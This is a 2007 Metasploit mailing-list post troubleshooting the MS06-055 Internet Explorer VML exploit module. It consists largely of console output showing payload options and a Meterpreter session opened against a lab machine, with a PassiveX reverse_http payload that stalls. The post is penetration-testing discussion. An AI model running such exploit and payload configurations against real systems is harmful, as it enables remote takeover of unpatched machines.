[framework] PassiveX-based payloads and MS06-055
Angelo Dell'Aera
buffer at softmedia.info
Tue Mar 13 06:35:27 CDT 2007
While doing few tests I noticed a strange behavior while trying
to exploit the VML processing vulnerability in IE referenced by the
Microsoft Bullettin MS06-055 on Windows XP SP1.
The first thing I tried is using Meterpreter as shown below.
msf exploit(ms06_055_vml_method) > show options
Module options:
Name Current Setting Required Description
------------------- -------- -----------
SRVHOST 192.168.33.130 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH pentest no The URI to use for this
exploit(default
is random)
Payload options:
Name Current Setting Required Description
------------------- -------- -----------
DLL /home/buffer/msf3/data/meterpreter/metsrv.dll yes The
local path to the DLL to upload
EXITFUNC seh yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows NT 4.0 -> Windows 2003 SP1
msf exploit(ms06_055_vml_method) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.33.130:8080/pentest
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.33.130:39557 ->
192.168.33.199:4444)
... and everything works fine.
When I try using PassiveX Meterpreter instead...
msf exploit(ms06_055_vml_method) > set PAYLOAD
windows/meterpreter/reverse_http PAYLOAD =>
windows/meterpreter/reverse_http msf exploit(ms06_055_vml_method) >
show options
Module options:
Name Current Setting Required Description
------------------- -------- -----------
SRVHOST 192.168.33.130 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH pentest3 no The URI to use for this exploit (default is
random)
Payload options:
Name Current Setting Required Description
------------------- -------- -----------
DLL /home/buffer/msf3/data/meterpreter/metsrv.dll yes The
local path to the DLL to upload
EXITFUNC seh yes Exit technique: seh, thread, process
PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes
ActiveX CLSID
PXAXDLL /home/buffer/msf3/data/passivex/passivex.dll yes ActiveX DLL
to inject
PXAXVER -1,-1,-1,-1 yes ActiveX DLL Version
PXHOST 192.168.33.130 yes The local HTTP listener hostname
PXPORT 10000 yes The local HTTP listener port
PXURI /OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s no The URI root for
requests
I see this behavior...
msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/pentest3
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Sending PassiveX main page to client
and it stops here. I tried using other PassiveX-based payloads with
the same exploit but no luck... always the same result. Other non
PassiveX-based payloads work instead.
I took a look at the registry and everything seems to work fine since
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\3
Values: 1004, 1200, 1201, 1001
are changed to the value 0 as expected.
Regards,
--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc. http://buffer.antifork.org
Metro Olografix
PGP information in e-mail header
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
Url : http://spool.metasploit.com/pipermail/framework/attachments/20070313/e9440e7c/attachment.pgp
More information about the framework
mailing list